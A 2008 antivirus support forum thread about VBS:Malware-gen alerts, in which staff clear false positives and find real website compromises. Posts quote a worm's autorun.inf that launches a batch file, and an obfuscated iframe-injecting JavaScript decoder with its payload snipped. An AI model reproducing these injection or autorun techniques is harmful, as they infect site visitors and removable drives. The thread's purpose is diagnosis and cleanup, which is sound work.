Avast WEBforum

Other => Viruses and worms => Topic started by: Malky on January 25, 2008, 12:19:31 AM

Title: VBS:Malware-gen
Post by: Malky on January 25, 2008, 12:19:31 AM
I just got my home avast update to ver. (current version 080124-0)
and every phpBB forum I try to get into gives me this virus warning and cuts off the connection.
I asked my friend, who had an older ver. of avast, to try my forum that I'm admin of (it's phpBB also and also gives me this virus warning) and go to some topics - he didn't get any warning - but then he made the update and suddenly he can't get into any phpBB forum, same as I do - he gets the warning about the VBS:Malware-gen virus and the connection is cut off...
What's going on???????????????????????
Title: Re: VBS:Malware-gen
Post by: Debra2008 on January 25, 2008, 12:26:55 AM
The same thing is happening to me.  Malwarecrush.com is driving me nuts.  It attaches over and over again and I can not get rid of it.  How do I get rid of it for good?  I have uninstalled over and over again.  I reported it to Avast the other day and received no response.  Someone, HELP!
Title: Re: VBS:Malware-gen
Post by: kubecj on January 25, 2008, 12:50:14 AM
This is an obvious false alarm and we're going to fix it ASAP.

Sorry for any inconvenience. We've done a major overhaul of the scripting detection and it still has some nuisances.
Title: Re: VBS:Malware-gen
Post by: joburg on January 25, 2008, 01:06:26 AM
I wanted to start a new thread but noticed kubecj's reply and take it that my problem is along the same lines:
After the latest update of Avast it all of a sudden warned me that VDownloader has a problem, Win32.Trojan-gen (UPX). No big deal because I've forgotten that I have this prog.
I then tried to d/l v0.61 again from their site and same issue.
It is in the VDownloader.exe and not the ffmpeg.exe or pthreadGC2.dll files.
I deleted the prog (standalone) and then scanned two prev versions but they are fine.

Ditto with SoftPerfect Network Scanner, Win32:Spyware-gen (Trj). I have had this prog (standalone) on my puter since 11 March 2007. Today is the first warning.
The current version downloads w/o any warning.

Ditto with Registry Trash Keys Finder v 3.7.4 - Win32:Trojan-gen (Other)

Are these due to some new development?
Title: Re: VBS:Malware-gen
Post by: Qwester on January 25, 2008, 02:17:38 AM
Hi guys, I'm new here. I unfortunately just received the VBS:malware-gen virus while going to this website www.cwmania.com and also I have the Win32:Agent-PBL [trj] virus on my system. The viruses were placed in the avast Virus chest; should I leave them in there or get rid of them off my system???
Title: Re: VBS:Malware-gen
Post by: dafourz on January 25, 2008, 04:45:41 AM
I also have a problem with Malware, but in my case, this is when I try to launch Google u_u

Is it the same problem as with the phpBB forums?  ???
Title: Re: VBS:Malware-gen
Post by: ozzieguy on January 25, 2008, 04:49:56 AM
If it is fixed, how do I stop getting the same problem [on daughters machine]?

I updated and rebooted and the same problem is there.

Look forward to your response.

Thanks
Ozzie
Title: Re: VBS:Malware-gen
Post by: Vlk on January 25, 2008, 04:53:05 AM
Ozzie, which page triggers the alarm in your case, exactly?

Thanks
Vlk
Title: Re: VBS:Malware-gen
Post by: ozzieguy on January 25, 2008, 04:58:46 AM
Every page my daughter loads.

Thanks VLK
Title: phpBB problem gone, but something is still going on
Post by: Herra Tohtori on January 25, 2008, 06:14:26 AM
The phpBB related problem seems to be solved along with the new definitions, but I'm still getting same - probably similarly false-positive - worm detections from some other pages.

http://members.lycos.co.uk/spacespider/

As a sample one. In case you want to know why that very random link popped up on my browsing, I was looking for some Baldur's Gate portraits and that link was listed in a page that lists those.

Haven't encountered it on other pages yet after the new definitions to fix the previous phpBB false positive problem. Of course, it could be genuine this time, but I suspect it because it's the same detection report, and what are the odds of that right after similar false positives started popping up with other pages...
Title: Re: VBS:Malware-gen
Post by: ozzieguy on January 25, 2008, 06:59:02 AM
Unfortunately my daughter got impatient and has downloaded AVG as that isn't doing the same thing thankfully.

Thanks for help.
Title: Re: VBS:Malware-gen
Post by: shadowofdark on January 25, 2008, 07:14:31 AM
I am also getting the same error for any page I visit since the update today. Once i stop the protect then I am able to go to any page i want to. When are you guys going to have a fix?
Title: Re: VBS:Malware-gen
Post by: Psyberxtreme on January 25, 2008, 07:16:16 AM
My VPS file is current 080125-0 and I am still getting the VBS:malware-gen warning every time I open a website/page.

Any suggestions or help would be appreciated - currently have both web and standard shields on Pause (not a warm and fuzzy feeling)

Thanks!
Title: Re: VBS:Malware-gen
Post by: stuthejock on January 25, 2008, 07:23:46 AM
I've just checked all my updates, both program and definitions are "up to date"
EVERY SINGLE site I try to visit reports the VBS:MALWARE-GEN infection.  :'(

This includes
uk.yahoo.com
www.google.com
forum.avast.com

PLEASE PLEASE PLEASE fix this. U R G E N T L Y !
Any chance you could re-release the last known good definitions as an "update" to fix this in the meantime ?
Title: Re: VBS:Malware-gen
Post by: kubecj on January 25, 2008, 09:09:11 AM
Please always report your actual VPS version and the exact url doing the false alarm, otherwise we can't cross-test it.
Title: Re: VBS:Malware-gen
Post by: Musta6 on January 25, 2008, 09:48:16 AM
I'm having the same problem. Since last night suddenly I got the virus notification from a single web page and since then it comes from every single web page I go to, or at least I haven't yet found a page that wouldn't give the warning.

VPS is up to date (current version 080125-0).  ???
Title: Re: VBS:Malware-gen
Post by: kubecj on January 25, 2008, 09:56:13 AM
This is weird. We've tested it to the best of our efforts, so I believe this is not merely an avast x webpage problem, i.e. a classical FP.

Do you have any web-filtering software installed which may change the pages?

Can you please try to save webpage and then scan it with on-demand scan of avast? If it does return the false alarm, can you send the zipped sample to virus@avast.com and also report what networking/web software you use?

Thanks.
Title: Re: VBS:Malware-gen
Post by: Musta6 on January 25, 2008, 10:00:31 AM
Ah... I found a solution. For some reason Sunbelt's firewall (Kerio, or whatever it's called?) doesn't seem to work that well with Avast anymore. When I turned the firewall off totally, now Avast doesn't say anything anymore, and when I turn it back on every webpage "has virus" again.
Title: Re: VBS:Malware-gen
Post by: kubecj on January 25, 2008, 10:04:42 AM
This Kerio cooperation problem should be fixed now in 080125-1.
Title: Re: VBS:Malware-gen
Post by: jaqub on January 25, 2008, 10:07:34 AM
I had a same problem with cooperation between avast and kerio(sunbelt). Try to turn-off firewall and then start it up again. In my case it helped somehow :)

brgds,
jaqub
Title: Re: VBS:Malware-gen
Post by: Musta6 on January 25, 2008, 10:10:35 AM
Quote
This Kerio cooperation problem should be fixed now in 080125-1.

Omg you ppl are fast  :D Best customer care I have ever got!
Title: Re: VBS:Malware-gen
Post by: letalis on January 25, 2008, 10:44:56 AM
Still problems even in the 080125-1 version,
but temporarily I stopped the web shield.

awaiting for a solution :)
Title: Re: VBS:Malware-gen
Post by: southernsatellite on January 25, 2008, 12:55:12 PM
I run a website and it's come up with the same thing, so I am worried that possible buyers are put off thinking I might affect their computers! Avast please do something about this.

It's not good for business >:(
Title: Re: VBS:Malware-gen
Post by: syj on January 25, 2008, 02:29:49 PM
Hi guys,

A sample of the alert I receive.

avast! [MATCHIR3]: File "http://www.horizon-mariage.com/forum/14_0-mariage-pas-cher.html\unp118192644" is infected by "VBS:Malware-gen" virus.
"Resident protection (Web Shield)" task used
Version of current VPS file is 080124-0, 24/01/2008
Title: Re: VBS:Malware-gen
Post by: kubecj on January 25, 2008, 02:33:18 PM
Current vps is 080125-2. Please update first.
Title: Re: VBS:Malware-gen
Post by: Psyberxtreme on January 25, 2008, 03:10:37 PM
Fantastic work!
080125-2 works fine and there are no more conflicts between Sunbelt firewall or Counterspy2.

As always Avast! and the brilliant people that comprise its staff have done an amazing and very fast job.

Great customer driven focus! Thanks for all your help!

Title: Re: VBS:Malware-gen
Post by: gimini on January 25, 2008, 04:26:59 PM
Hi, check this website: www.mediadot.ro . It gives the same error.
Title: Re: VBS:Malware-gen
Post by: thetao on January 25, 2008, 09:31:01 PM
We have a user currently on 080125-3 and getting VPS: Malware-Gen  hits when browsing the http://www.smithbarney.com site.  Load the home page and click "Indices" on the navigation bar near the top to try it yourself.
Title: Re: VBS:Malware-gen
Post by: thetao on January 25, 2008, 09:34:57 PM
Actually, try the big "Research and Commentaries" tab instead.
Title: Re: VBS:Malware-gen
Post by: kubecj on January 26, 2008, 12:07:49 AM
Detection was removed from the database and will be out in the next update.
Thanks for your feedback.
Title: Re: VBS:Malware-gen
Post by: dan the immunology man on January 26, 2008, 10:35:07 PM
Just wanted to say thanks for the quick response, Initially had this problem but appears corrected now.
Title: Re: VBS:Malware-gen
Post by: ericvd on January 27, 2008, 05:47:48 PM
Hello,
had the same VBS:Malware-gen stuff on a few different sites. They almost all disappeared after the different updates in Avast! (home edition) of the last 2 days, EXCEPT one: on my mail site (annoying!!).
Running VPS file version = 080127-1. Ran a full (= also program) update 1 hr ago (with no effect, since the standard setting = automatic update).
Site: WWW.aemail4u.com.
The problem starts when logging in on the mail server (I mean: www.aemail4u.com is OK, but any further attempt creates a warning).
Last msg from the log (2 mins ago):
Sign of "VBS:Malware-gen" has been found in "http://aemail4u.mail.everyone.net/email/scripts/welcome.pl?EV1=12014509807790792" file .
Title: Re: VBS:Malware-gen
Post by: kubecj on January 27, 2008, 06:03:55 PM
False alarm removed from the database. Will be out on the next update.

(You know, without report we can't do anything)
Title: Re: VBS:Malware-gen
Post by: mp5 on January 28, 2008, 09:08:00 PM
Updated VPS to 080128-0, but I'm still getting the problem with this address
http://www.huaren.us/index71.asp?boardid=355

It's ok to go to the main page, http://www.huaren.us/, but if you go to any forums the warning about VBS:Malware-gen will come up. It's a Chinese website, but it has English names for the forums too, like Exchange, Parenting, etc. My wife visits the website everyday. Please have the problem fixed so she can stop bothering me.  :(
Title: Re: VBS:Malware-gen
Post by: kubecj on January 28, 2008, 09:21:41 PM
False alarm removed. Thanks for your submission.

Please remember, that without the reports we can't fix things (because we don't know they're broken).
Title: Re: VBS:Malware-gen
Post by: jeannot on January 28, 2008, 10:47:08 PM
Hello,

I have the same problem with the website of a hotel in Italy: http://www.casalbertina.it/
I receive this virus message and the connection can't go on.
I immediately did a scan of the PC: Avast found the same "virus" on d: in a folder where there is nothing special or new (some previous scans of this folder with avast and another online antivirus found nothing), then blocked it.
Avast updates itself automatically.
Here is the log :
"28/01/2008 20:07:26   SYSTEM   1444   Sign of "VBS:Malware-gen" has been found in "http://www.casalbertina.it/favicon.ico" file. 
28/01/2008 20:07:34   SYSTEM   1444   Sign of "VBS:Malware-gen" has been found in "http://www.casalbertina.it/" file. 
28/01/2008 20:09:30   SYSTEM   1444   Sign of "VBS:Malware-gen" has been found in "http://www.casalbertina.it/" file. 
28/01/2008 20:42:09   SYSTEM   1444   Sign of "VBS:Malware-gen" has been found in "http://www.casalbertina.it/" file. 
28/01/2008 20:42:28   SYSTEM   1444   Sign of "VBS:Malware-gen" has been found in "http://www.casalbertina.it/" file. 
28/01/2008 21:04:56   Eigenaar   3944   Sign of "Win32:Adware-gen [Adw]" has been found in "D:\BACK UP PROGRAMMES ET OUTLOCK\MISES A JOUR  PC\Nero-6.6.1.15a.exe\Toolbar.exe\[Embedded#620d0]\[Embedded#04080]" file. 
28/01/2008 22:23:37   SYSTEM   1448   Sign of "VBS:Malware-gen" has been found in "http://www.casalbertina.it/" file.  "

Can you help me?
Thanks in advance
Title: Re: VBS:Malware-gen
Post by: kubecj on January 28, 2008, 11:28:29 PM
The hotel's webpage contains a double-encrypted hidden iframe. I'd not call this a false alarm, it's highly suspicious.
Title: Re: VBS:Malware-gen
Post by: jeannot on January 29, 2008, 11:12:14 AM
OK. Thank you.
But the other one found on d:?
It's an update of Nero 6 (downloaded a long time ago from the Ahead site) which was ignored before.
An explanation?
Title: Re: VBS:Malware-gen
Post by: ericvd on January 29, 2008, 04:34:57 PM
Thanks for your help! Last update loaded today (***128-0), and my problem is solved.
You're the best ! ! ! 
Title: Re: VBS:Malware-gen
Post by: mp5 on January 30, 2008, 01:15:53 AM
Quote
Updated VPS to 080128-0, but is still getting the problem with this address
http://www.huaren.us/index71.asp?boardid=355

Updated and problem solved. Thanks a bunch!
Title: Re: VBS:Malware-gen
Post by: mairy on January 31, 2008, 05:24:57 PM
Same problem here while trying to enter http://foromjworldpage.mforos.com, a forum of the www.miarroba.com community. I guess that's the web... It's the only website I entered today...

VPS: 080131-1

I tried to click the options but the alarm comes again just some seconds later.
Title: Re: VBS:Malware-gen
Post by: kubecj on January 31, 2008, 05:28:18 PM
Running the very same VPS, I visited the site and got no warning. Next time please copy the url from the warning dialogue, so that I may download and check it. Thanks.
Title: Re: VBS:Malware-gen
Post by: mairy on January 31, 2008, 05:32:34 PM
Ok, I'll do it.... But, meanwhile, how do I close the window that appears over and over again? Do I have to click "no hacer nada" ("don't do anything")?.... All the other options don't work, the window appears just some seconds later....
Title: Re: VBS:Malware-gen
Post by: mairy on January 31, 2008, 06:09:27 PM
It says the virus was found in "c:\autorun.inf". The log says nothing about any website....

And the window appears over and over again, I'm starting to go crazy ::)
Title: Re: VBS:Malware-gen
Post by: Maxx_original on January 31, 2008, 09:35:50 PM
it's a correct detection imho... autorun viruses are quite widespread in last few months... i can't understand microsoft hole to system, when they left autoruns turned on for all drives by default.. it gives no sense to allow autorun for other devices than CD/DVD... unfortunately, many ppl have no idea how to turn it off right after installation.. :-\
Title: Re: VBS:Malware-gen
Post by: mairy on January 31, 2008, 09:59:48 PM
Honestly, I've got no idea what you're talking about.... This is the very first time something like this has happened to me since I got Avast (and that's like a year and a half...). I'm still trying to click on the options but the window still appears over and over again....

Someone please tell me what I should do.... Taking into account that I've got no idea of how the system works and all that... I'm just an average user.
Title: Re: VBS:Malware-gen
Post by: Maxx_original on January 31, 2008, 11:24:43 PM
follow the threads with the INF:Autorun discussion... you can use the search function ;)
Title: Re: VBS:Malware-gen
Post by: mairy on January 31, 2008, 11:59:45 PM
I've been searching and there are quite a lot of posts about that.... I got absolutely lost... Maybe because of my English, maybe because I don't have much idea about this kind of thing...

If you could please give me the instructions, or something.... I'll be thankful

Anyway, I gotta go now, let's if I can fix the problem tomorrow.

Thanks.
Title: Re: VBS:Malware-gen
Post by: Maxx_original on February 01, 2008, 08:57:57 AM
can you look at the content of your autorun.inf?
Title: Re: VBS:Malware-gen
Post by: vlukinius on February 01, 2008, 11:35:25 AM
Since yesterday me and other avast users get VBS:Malware-gen found on http://www.deliverance-guild.com/ where we use PHP-Nuke.
I scanned it with http://www.freedrweb.com/browser/mozilla+firefox/ with no detection of anything.
If I download the php file moduels.php and scan it locally I get the same.

A zipped version of the php file is available at:
http://www.deliverance-guild.com/erduker/PhPNukeModulesVBSMalware-gen.zip

I believe this is a false detection. Correct me if I am wrong.
Title: Re: VBS:Malware-gen
Post by: kubecj on February 01, 2008, 11:54:20 AM
Inside the page there is an encrypted string, containing a hidden iframe pointing to counter-google.com. A quick web search found this site mentioned only in ties with malware.

Hm, it seems that there is a lot of 'stuff' around...  ::)
Title: Re: VBS:Malware-gen
Post by: mairy on February 01, 2008, 02:24:56 PM
Quote
can you look at the content of your autorun.inf?
This is what it says:

;L7rkJLrfswDfUDdFkq55r1p484okrw2owk3Xl2kakaqeKjk0IqSD73iiiADki3dkloD9S4K25jqL4k0qs3lKlqfKddea
[AutoRun]
;2IsSK4CsLL0ojSrS51sr9eowUi1d3ioa435adSL23dDsOasLp6
open=juok3st.bat
;LwSKs25530Kms3r5JDKXki4sqr2k1ol43JwaLl4jaSDfksLD25faq3Kw297iL262akl4wLilKZ2ffosdkpdiAsiirwi3jdikS7aa7q8a4dA0llJa
shell\open\Command=juok3st.bat
;A43Aw7wfoL2q3a2
shell\open\Default=1
;s4Dr745s5ao30a2kfkr14fs3ikaaowerjwiap3l50DkDLaKDe2md26w2krk1wj9Dd5q72iDAo4lIkKa32akf3qwslL3s7aFAljL4Jk5X
shell\explore\Command=juok3st.bat
;csk0Ciksi3adlKoje73aKoDp1rA4Lo7kq1SdA99iF3nkwsdk6AqO2Jawids4ri50w8paDkAd5p2Hss0Leaa1rdd0a3s
Title: Re: VBS:Malware-gen
Post by: wxped on February 01, 2008, 11:53:40 PM
Hey, I think I've also got a problem with this vbs:malware-gen virus, which is that with every new external disk I put in my PC, my avast is giving me that warning: "F:/autorun.inf is infected with vbs:malware-gen" and avast isn't deleting it.. what must I do?
thanks..
Title: Re: VBS:Malware-gen
Post by: Hari VS on February 02, 2008, 04:31:47 AM
Hi, I'm facing the same problem as Mairy. The Avast On-access Scanner keeps popping up with the following message:

File name:          C:\autorun.inf
Malware Name:   VBS:Malware-gen
Malware Type:    Virus/Worm
VPS Version:       080201-1, 02/01/2008

But I'm unable to delete, repair, or move the virus to the chest. It affects all three drives, C:, D: and H: (removable).

A friend recommended using Flash Disinfector, as she had the same problem and it worked for her. But hasn't worked for me.

I'm also using AVG concurrently, and it detected a Funny UST Scandal.avi.exe, which Avast couldn't detect. What would you suggest I do to get rid of them all. Thank you!

Best Regards,
Hari
Title: Re: VBS:Malware-gen
Post by: rdmaloyjr on February 02, 2008, 05:15:39 AM
Quote
Hi, I'm facing the same problem as Mairy. The Avast On-access Scanner keeps popping up with the following message:

File name:          C:\autorun.inf
Malware Name:   VBS:Malware-gen
Malware Type:    Virus/Worm
VPS Version:       080201-1, 02/01/2008

But I'm unable to delete, repair, or move the virus to the chest. It affects all three drives, C:, D: and H: (removable).

A friend recommended using Flash Disinfector, as she had the same problem and it worked for her. But hasn't worked for me.

I'm also using AVG concurrently, and it detected a Funny UST Scandal.avi.exe, which Avast couldn't detect. What would you suggest I do to get rid of them all. Thank you!

Best Regards,
Hari
Don't use more than one anti-virus with real-time scanning at the same time, they will conflict!  avast! will shut down some or all of its components to avoid conflict.  Try a boot-time scan with only avast! on your computer.
Title: Re: VBS:Malware-gen
Post by: bdj on February 07, 2008, 11:04:50 PM
I see from Jan 24, 2008 that kubecj writes that "This is an obvious false alarm and we're going to fix it ASAP. Sorry for any inconvenience. We've done a major overhaul of the scripting detection and it still has some nuisances."

Has this been fixed and if so how does the Avast world get the update?

My problem is with the resident program. By default the Script Blocking module of the program is running. So when I go to http://pagegravy.com/client_demos/AviationIndustryExpo.html, I am warned that a sample of the VBS:Malware-gen was found. By disabling this module the page loads as normal.

My concern is that I want to place the ad that is in this page on my website. But I can't do this knowing that people with Avast who visit my site will get this warning.
Title: Re: VBS:Malware-gen
Post by: DavidR on February 08, 2008, 12:24:21 AM
Well it seems avast isn't alone in detecting something on that page, so does the DrWeb link checker: In file >AviationIndustryExpo.html/javascript.0

So is that the same file avast is alerting on ?

DrWeb link checker, http://online.drweb.com/?url=1
Title: Re: VBS:Malware-gen
Post by: bdj on February 08, 2008, 03:29:42 PM
Hey, thanks for the quick response. My vendor has modified the file to keep Avast and other protectors from falsely alerting on the site.
Title: Re: VBS:Malware-gen
Post by: DavidR on February 08, 2008, 04:24:06 PM
Thanks for the feedback, no detection by either the DrWeb link checker or avast.

Welcome to the forums.
Title: Re: VBS:Malware-gen
Post by: woodybolo on February 15, 2008, 07:22:05 AM
Hi,

same "VBS:Malware-gen" problem with
http://www.ziza.ru/

http://img182.imageshack.us/img182/9484/sanstitregv7.jpg

says it's clean

but with Avast no

- Programme : Déjà à jour
  (version actuelle 4.7.1098)
- Vps : Déjà à jour
  (version actuelle 080214-0)

very annoying

thank you for checking

Title: Re: VBS:Malware-gen
Post by: jsejtko on February 15, 2008, 09:23:02 AM
False positive detection on http://www.ziza.ru/ will be corrected in the next vps update. Thanks for attention.
Title: Re: VBS:Malware-gen
Post by: lazor on February 16, 2008, 06:48:58 PM
No matter what I do this will not go away. Can anyone help?
Thanks
Bob
C:\Documents and Settings\ROBERT LAZOR\Local Settings\Temporary Internet Files\Content.IE5\SPOH6J05\check[1].js
C:\Documents and Settings\ROBERT LAZOR\Local Settings\Temporary Internet Files\Content.IE5\SPOH6J05\check[2].js
Malware name VBS:Malware-gen
Malware type Virus/Worm
VPS version 080215-0, 02/15/2008
Title: Re: VBS:Malware-gen
Post by: kubecj on February 16, 2008, 06:57:27 PM
They're in your cache, so delete the cache (Temporary Internet Files) and this should go away. If they reappear, that means that you don't have Webshield turned on and they're getting downloaded and most probably executed.

If you want them checked, please send them to virus@avast.com and tell us we're catching them as a virus. But you may also want to check them using Virustotal for the detection of the other antiviruses.
Title: Re: VBS:Malware-gen
Post by: hawick on February 18, 2008, 07:47:52 PM
My webshield is on but I am getting several of these BV:Malware-gen thingies too.

Apologies for the dumb questions; what sort of dangers do they pose? Also, what do you mean by 'delete the cache' and how do you do this?

EDIT: When the scan finished the items were successfully moved to chest; is it safe just leave them there?
Title: Re: VBS:Malware-gen
Post by: tVadio on February 20, 2008, 04:19:12 PM
I run the website http://www.tVadio.com
 
Avast has been reported by a number of users to be providing a false positive virus announcement stating tVadio has the VBS:Malware-gen virus.
 
Could you please fix this or let me know if there is anything I need to do.
Title: Re: VBS:Malware-gen
Post by: kubecj on February 20, 2008, 04:29:23 PM
After the end of </html> of site tvadio.com, there is added JavaScript, with an encrypted string which contains a hidden iframe pointing to salevisitor.net. This is highly suspicious. Do you know about the code?
Title: Re: VBS:Malware-gen
Post by: FreewheelinFrank on February 20, 2008, 05:02:58 PM
avast! is not the only AV to detect malware on the page:

Antivirus     Version     Last Update     Result
AhnLab-V3   2008.2.20.0   2008.02.20   -
AntiVir   7.6.0.67   2008.02.20   -
Authentium   4.93.8   2008.02.20   -
Avast   4.7.1098.0   2008.02.20   -
AVG   7.5.0.516   2008.02.20   -
BitDefender   7.2   2008.02.20   -
CAT-QuickHeal   9.50   2008.02.18   -
ClamAV   0.92.1   2008.02.20   -
DrWeb   4.44.0.09170   2008.02.20   Trojan.Click.4756
eSafe   7.0.15.0   2008.02.17   -
eTrust-Vet   31.3.5550   2008.02.20   -
Ewido   4.0   2008.02.19   -
FileAdvisor   1   2008.02.20   -
Fortinet   3.14.0.0   2008.02.19   -
F-Prot   4.4.2.54   2008.02.19   -
F-Secure   6.70.13260.0   2008.02.20   -
Ikarus   T3.1.1.20   2008.02.20   -
Kaspersky   7.0.0.125   2008.02.20   -
McAfee   5233   2008.02.20   -
Microsoft   1.3204   2008.02.20   -
NOD32v2   2889   2008.02.20   -
Norman   5.80.02   2008.02.19   -
Panda   9.0.0.4   2008.02.20   -
Prevx1   V2   2008.02.20   -
Rising   20.32.22.00   2008.02.20   -
Sophos   4.26.0   2008.02.20   Mal/Iframe-F
Sunbelt   3.0.884.0   2008.02.19   -
Symantec   10   2008.02.20   Downloader
TheHacker   6.2.9.224   2008.02.19   -
VBA32   3.12.6.1   2008.02.17   -
VirusBuster   4.3.26:9   2008.02.19   -
Webwasher-Gateway   6.6.2   2008.02.20   -

(I guess Webshield must decode unescape where the scanner at VirusTotal doesn't.)
Title: Re: VBS:Malware-gen
Post by: FreewheelinFrank on February 20, 2008, 05:08:33 PM
The encrypted link is infected too:
Title: Re: VBS:Malware-gen
Post by: tVadio on February 20, 2008, 08:08:15 PM
Quote
After the end of </html> of site tvadio.com, there is added JavaScript, with an encrypted string which contains a hidden iframe pointing to salevisitor.net. This is highly suspicious. Do you know about the code?
No I do not.

I downloaded a local copy of the homepage code and found this:

<script type="text/javascript">
<!-- -->
<!--
document.write(unescape('%3C%69%66 ...snip... %6D%65%3E'));
//-->
</script>

I got rid of that code and it is now fine.

Any explanation - I certainly did not put that code there.

How did you figure out it was from salesvisitor.net?
Title: Re: VBS:Malware-gen
Post by: kubecj on February 20, 2008, 08:18:49 PM
Quote
I got rid of that code and it is now fine.

Any explanation - I certainly did not put that code there.
You've been hacked. There is a non-zero probability such code or similar will be there sooner or later again. You should check all of the software you're using for potential security issues. There is also a probability that there is some other kind of malware somewhere.

Quote
How did you figure out it was from salesvisitor.net?

We've got tools for 'decrypting' such stuff.
Title: Re: VBS:Malware-gen
Post by: FreewheelinFrank on February 20, 2008, 08:58:38 PM
Quote
We've got tools for 'decrypting' such stuff.

Very James Bond, but your tools are also available online:

http://www.linkedresources.com/tools/unescaper_v0.2b1.html

 ;D
Title: Re: VBS:Malware-gen
Post by: kubecj on February 20, 2008, 09:02:11 PM
Quite possible. I put it in quotes, because it's a really simple script (except that it does automatically extract all unescape sequences and print them without any manual work). No rocket science employed here  ;)
Title: Re: VBS:Malware-gen
Post by: simple-it-solutions on February 21, 2008, 11:16:20 AM
We are getting a false positive on http://www.littlemonkey.co.nz , VPS version 080220-0, 20/02/2008. Could you look into this?

Regards

Graham.
Title: Re: VBS:Malware-gen
Post by: jsejtko on February 21, 2008, 03:08:42 PM
The alert on http://www.littlemonkey.co.nz is not a false positive. Probably when your server redirects to another location, it sends suspicious code with an encrypted iframe with the following address:
http://tipocnt.com/....

Do you know this server?

Title: Re: VBS:Malware-gen
Post by: simple-it-solutions on February 21, 2008, 06:13:57 PM
Whereabouts in the code have you found a reference to http://tipocnt.com/?

I have downloaded all the scripts for the home page and cannot find a reference to this server in the code. Are you sure you are correct?

If so do you know which script may be infected?

Regards

Graham.
Title: Re: VBS:Malware-gen
Post by: kubecj on February 21, 2008, 06:16:49 PM
Somewhere along the downloading of the page, this gets downloaded:

<script language="JavaScript">e = '0x00' + '19';str1 = "%A2%FA%F1 ...snippage... %B7%FA%F1%EC%A4";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));
str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);
}document.write(str);</script>

It contains 'encrypted' hidden iframe leading to tipcont.com
Title: Re: VBS:Malware-gen
Post by: simple-it-solutions on February 21, 2008, 06:40:07 PM
Thanks for that we will look into it straight away.

Regards

Graham.
Title: Re: VBS:Malware-gen
Post by: simple-it-solutions on February 21, 2008, 06:48:53 PM
I don't have FTP access to this server, but this line of code looks wrong to me. Is anyone else here familiar with this being inserted into websites?

<script type='text/javascript' src='/e107_files/sleight_js.php'></script>

The .php part looks like it is to prevent downloading or viewing while it runs as a script?

Regards

Graham.
Title: Re: VBS:Malware-gen
Post by: Dig on February 21, 2008, 09:48:39 PM
Hi,

http://www.littlemonkey.co.nz is my site.  I've double and triple checked the scripts running on the site, I've used FireBug to determine network activity when loading the page and can find no encrypted javascript or references to tipocnt.com.

I have scanned it with NOD32 (Virus Bulletin's top-rated antivirus software: http://www.eset.com/products/compare-NOD32-vs-competition.php) and the page is clean.

I have dealt with and cleaned up other sites in the past that have had similar exploits, so I do know what I'm looking for, and was convinced it was a false positive for avast (something that is not unheard of by any means) until kubecj and jsejtko indicated otherwise.  I would really appreciate some further information, i.e. WHERE in the source is that javascript being downloaded and HOW did you determine that it was tipocnt.com?

This is important not just for casual visitors to my site, but for a specific prospect that uses Avast and needs to view my site.

Thanks

Nick

Title: Re: VBS:Malware-gen
Post by: simple-it-solutions on February 21, 2008, 10:23:16 PM
I have seen Dr.Web mentioned a few times, so I have just run a check using it on http://www.littlemonkey.co.nz and it comes up clean. Can we please get someone else to check and confirm that avast may be at fault here?

Regards

Graham
Title: Re: VBS:Malware-gen
Post by: kubecj on February 21, 2008, 10:29:05 PM
http://www.littlemonkey.co.nz

In fact, this is a neat trick. The javascript is sent along with the 302 (redirect) reply. Not sure what browsers 'should' do when they get both a 302 and the content, but obviously, your server sends the 'ugly' stuff.

This is VirusTotal report regarding the code:
http://www.virustotal.com/cs/analisis/7312aedf9204d7300566560d4f681ee0

Hypertext Transfer Protocol
    HTTP/1.1 302 Found\r\n
        Response Code: 302
    Date: Thu, 21 Feb 2008 21:23:34 GMT\r\n
    Server: Apache/2.2.3 (Debian) mod_ssl/2.2.3 OpenSSL/0.9.8e mod_perl/2.0.2 Perl/v5.8.8\r\n
    X-Powered-By: PHP/5.2.0-8+etch9\r\n
    Location: news.php\r\n
    Connection: close\r\n
    Transfer-Encoding: chunked\r\n
    Content-Type: text/html\r\n
    \r\n
    Data (545 bytes)

0000  00 11 2f 0e db b3 00 0b 6b 4d 0a 8c 08 00 45 00   ../.....kM....E.
0010  03 58 22 52 40 00 28 06 e1 c4 d2 37 69 52 0a fe   .X"R@.(....7iR..
0020  05 02 00 50 05 22 f3 26 15 f1 e0 0f 4d cc 50 18   ...P.".&....M.P.
0030  19 20 42 18 00 00 48 54 54 50 2f 31 2e 31 20 33   . B...HTTP/1.1 3
0040  30 32 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20   02 Found..Date:
0050  54 68 75 2c 20 32 31 20 46 65 62 20 32 30 30 38   Thu, 21 Feb 2008
0060  20 32 31 3a 32 33 3a 33 34 20 47 4d 54 0d 0a 53    21:23:34 GMT..S
0070  65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e   erver: Apache/2.
0080  32 2e 33 20 28 44 65 62 69 61 6e 29 20 6d 6f 64   2.3 (Debian) mod
0090  5f 73 73 6c 2f 32 2e 32 2e 33 20 4f 70 65 6e 53   _ssl/2.2.3 OpenS
00a0  53 4c 2f 30 2e 39 2e 38 65 20 6d 6f 64 5f 70 65   SL/0.9.8e mod_pe
00b0  72 6c 2f 32 2e 30 2e 32 20 50 65 72 6c 2f 76 35   rl/2.0.2 Perl/v5
00c0  2e 38 2e 38 0d 0a 58 2d 50 6f 77 65 72 65 64 2d   .8.8..X-Powered-
00d0  42 79 3a 20 50 48 50 2f 35 2e 32 2e 30 2d 38 2b   By: PHP/5.2.0-8+
00e0  65 74 63 68 39 0d 0a 4c 6f 63 61 74 69 6f 6e 3a   etch9..Location:
00f0  20 6e 65 77 73 2e 70 68 70 0d 0a 43 6f 6e 6e 65    news.php..Conne
0100  63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 54 72   ction: close..Tr
0110  61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a   ansfer-Encoding:
0120  20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 74 65 6e    chunked..Conten
0130  74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d   t-Type: text/htm
0140  6c 0d 0a 0d 0a 32 31 35 0d 0a 0a 3c 73 63 72 69   l....215...<scri
0150  70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76   pt language="Jav
0160  61 53 63 72 69 70 74 22 3e 65 20 3d 20 27 30 78   aScript">e = '0x
0170  30 30 27 20 2b 20 27 31 39 27 3b 73 74 72 31 20   00' + '19';str1
0180  3d 20 22 25 41 32 25 46 41 25 46 31 25 45 43 25   = "%A2%FA%F1%EC%
